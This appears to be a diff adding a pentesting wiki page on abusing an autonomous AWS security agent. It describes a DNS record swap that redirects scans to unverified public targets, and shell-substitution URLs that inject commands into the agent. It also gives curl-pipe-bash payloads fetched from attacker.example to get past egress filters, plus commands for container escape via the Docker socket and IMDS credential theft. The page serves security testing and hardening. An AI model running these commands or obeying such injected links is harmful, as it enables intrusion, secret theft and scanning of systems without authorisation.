Pentesting a Pentest Agent Here's What I've Found in AWS Sec...

src/SUMMARY.md

@@ -316,6 +316,7 @@
     - [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md)
     - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md)
     - [Readme](pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md)
+    - [Readme](pentesting-cloud/aws-security/aws-post-exploitation/aws-security-agent-abuse/README.md)
   - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
     - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md)
     - [AWS - AppRunner Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc/README.md)

src/pentesting-cloud/aws-security/aws-post-exploitation/README.md

@@ -2,4 +2,13 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
+## AWS Security Agent / Autonomous Scanner Runtimes
 
+{{#ref}}
+aws-security-agent-abuse/README.md
+{{#endref}}
+
+## References
+
+- [https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html](https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html)
+{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-security-agent-abuse/README.md

@@ -0,0 +1,83 @@
+# AWS Security Agent Abuse
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Split-horizon DNS verification confusion (private -> public target swap)
+
+Some autonomous pentest platforms allow scanning **"Unreachable"** domains only when the test is attached to a **private network** (VPC). If their **pre-run verification** uses the VPC resolver, a tester controlling a **private hosted zone** can pass ownership checks **inside the VPC** and then **swap the A record to a public IP** after the pre-run step completes.
+
+Generic flow:
+
+1. Add a target domain using DNS TXT validation so it lands in **Unreachable** (public TXT is missing).
+2. Attach the scan to a VPC and create a **private hosted zone** for the target domain.
+3. In the private zone:
+   - Set `<victim_domain>` A record to a **private IP** inside the VPC CIDR.
+   - Set `_aws_securityagent-challenge.<victim_domain>` TXT to the verification token.
+4. Start the test and wait for the **setup / pre-run** verification to finish.
+5. **Flip the A record** in the private zone to the **public IP** of the real target.
+6. If the platform **does not continuously re-verify** ownership / private-IP constraints, the scan continues against the public target **via NAT egress**.
+
+Notes:
+
+- This is a **platform abuse pattern**: any scanner that treats private DNS verification as sufficient and assumes DNS stability can be redirected.
+- The key invariant to enforce is **"target must stay private"** throughout the job, not only at start.
+
+## Malicious target -> command execution via link following
+
+Autonomous agents that **aggressively follow links** and evaluate them in a **shell-like context** can be tricked into **command execution** by embedding shell substitution in URLs, for example:
+
+```text
+https://target.example/admin?identity=$(id|base64 -w0)
+```
+
+If the agent **executes the substitution**, the response leaks process identity or other local data. This can be extended to read runtime secrets from files (for example `/codebuild/output/tmp/env.sh`) or stage additional payloads.
+
+## Bypass egress guardrails with HTTP-tunneled shells
+
+If outbound controls block raw reverse shells (e.g., `nc`) or require **traffic that looks like real HTTP**, wrap the C2 channel in an **HTTP-tunneled shell** and deliver it as a script the agent will fetch and execute. This can bypass filters that only allow HTTP-like traffic to port 80/443.
+
+Typical delivery patterns:
+
+- `curl https://attacker.example/payload.sh | bash`
+- `curl https://attacker.example/payload.py | python3 &`
+
+## Local privesc + container escape inside scanner runtimes
+
+Once code execution is achieved inside a scanner runtime:
+
+- **Check sudoers** for `NOPASSWD` rules on interpreters (e.g., Python). If present, re-run the payload with `sudo` to become root inside the container.
+- **Check for Docker socket exposure** (`/var/run/docker.sock` or `/run/docker.sock`). If mounted, use the Docker API to enumerate containers and **launch a new container that mounts the host filesystem**, then implant a reverse shell or persistence mechanism.
+
+Example Docker socket probe:
+
+```bash
+curl --unix-socket /var/run/docker.sock \
+  http://localhost/containers/json?all=true
+```
+
+See also:
+
+- ECS post-exploitation notes on Docker socket access and task credential theft:
+
+{{#ref}}
+../aws-ecs-post-exploitation/README.md
+{{#endref}}
+
+## Post-escape AWS credential theft via IMDS
+
+After escaping to the underlying host (or gaining host-level access), query **IMDS** to retrieve instance profile credentials and use them to confirm impact (for example, CloudWatch Logs writes).
+
+```bash
+TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
+  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
+  http://169.254.169.254/latest/meta-data/iam/security-credentials/)
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
+  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
+```
+
+## References
+
+- [https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html](https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}